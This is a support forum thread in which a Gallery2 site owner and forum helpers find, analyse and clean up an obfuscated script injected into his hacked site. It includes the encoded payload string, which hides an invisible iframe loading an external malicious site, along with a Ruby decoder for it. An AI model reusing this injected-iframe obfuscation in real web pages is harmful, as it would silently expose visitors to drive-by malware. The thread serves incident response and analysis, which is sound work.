Avast says my Gallery2 website is infected with a Trojan, please help!

Hi,

I have several web sites, one of them a gallery with my astronomical images. Yesterday I posted a new picture I took a few days ago and someone warned me that Avast says my site is infected with a Trojan. Then someone else reported the same, also with Avast. I use two different (nameless :slight_smile: virus scanners on my PCs and they donā€™t see a problem. Clearly I want to exterminate any infections in my site but I also donā€™t want false positives to keep people away. Could someone from Avast please have a look? I googled the subject and searched this site but didnā€™t see it reported before.

This is the link: http://gallery.tungstentech.com/main.php?g2_itemId=1406

Thanks!

Generally, avast detection is accurate in these cases.
Isnā€™t it an encrypted/obfuscated script or iframe?
Wasnā€™t the site hacked?

Iā€™ll take a look into its codeā€¦

Yeah, the site was hackedā€¦
In the end of the page, there is an encrypted scriptā€¦

var eMCeGjolMPJFNuucZWLk = ... ... continues.

Wow, thatā€™s terrible. Thanks! Iā€™ll fix it asap and have taken my site offline for now.

You also need to address why you got hacked and close the vulnerability or ā€˜Iā€™ll be back.ā€™

  • This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any ā€œdefault.aspxā€ or
    ā€œdefault.cfmā€ pages as those are popular targets too.

  2. Remove any ā€œrougeā€ files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    ā€œstrongā€ password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Also see forum topic, http://forum.avast.com/index.php?topic=45458.0.

Yes, naturally.

Hi SanderP,

I get this error code:

HEAVILY EDITED BY ME!^h2 Configuration Error: Missing Theme ^/h2^
^/div^
^div class="gbBl*ck"...^
^h3> Missing Theme .../h3^
 ^p class="giDescripti*n"^
This album is configured to use the ^b>carbon</b^
 theme, but it is either inactive, not installed, or incompatible.
To fix this problem you can either ^...a href="main.php?g2_view=core.UserAdmin&g2_subView=c*re.UserLogin&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"...^
login^/a> and then <a href="main.php?g2_view=core.ItemAdmin&g2_subView=c*re.ItemEdit&g2_editPlugin=ItemEditAlbum&g2_itemId=1405&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^.................
choose a new theme for this album^/a> or <a href="main.php?g2_view=c*re.UserAdmin&g2_subView=c*re.UserLogin&...........
g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_pr*blem%3DmissingTheme%26g2_itemId%3D1406%26"^
login as a site administrat*r</a> and then <a href="main.php?g2_view=c*re.SiteAdmin&g2_subView=core.AdminPlugins&g2_mode=c*nfig&...............g2_return=%2Fmain.php%3Fg2_view%3Dcore.Sh*wItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^
install or activate this theme^/a^

You are familiar with this, probably the loading of the redirect?

polonus

Hi,

I donā€™t see that error right now. I just installed the latest Gallery2 code and was able to upgrade the database. Things look good and I verified that the javascript is no longer being emitted. Iā€™ll be taking further precautions, naturally. Do you still see it?

Thanks,

Sander

Hi SanderP,

I checked again using the bad stuff detektor, and the failcode I could not detect this time.
This what you have to check now:
Results from 22.10 Dutch local time - European Central Time -
No zeroiframes detected!
Check took 10.05 seconds

(Level: 0) Url checked:
hxtp://gallery.tungstentech.com/main.php?g2_itemId=1406
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/main.php?g2_view=core.combinedjavascript&g2_key=5d713f3ae3d3f2c55383cb50739371e9
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/themes/carbon/theme.js
Zeroiframes detected on this site: 0
No ad codes identified

Please adopt the links you gave in your postings to make them non.click-able for the curious of nature, like I did above using either htXp:// or wXw

polonus

I will do that, good idea.


Here is something else to consider :

I use two different (nameless virus scanners on my PCs and they don't see a problem.

This may be why your computer does not detect this problem.


Hi CharleyO,

This could be true, if there are two resident virus scanners there they will interfere with each other and alert each others signatures. A resident scanner like avast combined with a non-resident scanner like DrWebCureIt or Standalone AV-scanner like McAfeeā€™s stinger.exe etc. pose no problems,

So the mistake made here is that more of the same is better, same mistake can be made with software firewalls. It is like two dogs guarding a house, and in stead of guarding the house, they start to fight among each other while the malcreant can sneak in,

polonus

Eh, yeah. Iā€™m not that much of a noob you know :slight_smile: I meant two different PCs, two different virus scanners. My company uses Symantec corporate and I use something else.

Hi SanderP,

No offense meant, you will be OK, as soon as you are being made familiar where you have to look on the site for the malcode infection. This for check ups can help: http://www.blacklistdoctor.com/bld/diagnose.php
There arenā€™t a lot of av vendors that have set out to their users that there is a big difference between general (OS and software independent) malcode and OS and software specific malware, they often are presented and swept together for obvious reasons. But to better analyze malcode all sorts we should consider and determine under what category it comes, also to better evaluate the vector payload. Thanks again for reporting, and providing the malware fighterā€™s challenge,

polonus

I converted the jscript to ruby to see what it does. The iframe gets the source from you - found - it . org (no spaces) which thankfully is suspended according to whois. I tried to get the page with wget and it timed out. So luckily the infection has been harmless for at least a while.

Here is the ruby equivalent of the code. Naturally the puts was a document . write to add the iframe:

enc_str = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc102jc114jc97jc109jc101jc62"

split_enc_str = enc_str.split("jc")
out_str = ""
split_enc_str.each do |num|
	out_str+=num.to_i.chr
end

puts out_str

Hi SanderP,

Also analyze with these online resources: http://www.gooby.ca/decrypt/
and consider this new malcoderā€™s trick: http://blog.fortinet.com/malicious-javascript-obfuscation-divide-et-impera/

Stay safe and secure online is the wish and command of,

polonus

Hi,

another one of my sites was infected as well and it seems the entire host has been taken. I installed avast! on this computer and it complained about the same trojan when I wanted to log into my control panel. Looking around the site I found an unknown directory with a php file. Itā€™s a jumbled mess but itā€™s clear it tries to insert the tag adsttnmq1 in webpages. Should I upload the php somewhere for you to analyze? In this case it added a whole bunch of links to my default.aspx which is a dotnetnuke page.

PHP has been disabled on that site and the offending code was removed.

Thanks,

Sander

There is another topic where this is the same, as the hack included the hosts control panel files too. So in cases like this you should inform the Host as the control panel pages are outside of your control.

It may be that the version of PHP was old and being exploited.

Hi,

naturally I immediately let the host know that even his main site was infected. I think theyā€™re kind of busy because I didnā€™t get a response yet :slight_smile: I removed all infected code from my sites and bolted down the configs as much as possible, disabling cg-bin/php etc on my asp.net sites. That was already done on some of them but it could be improved in others.

Sander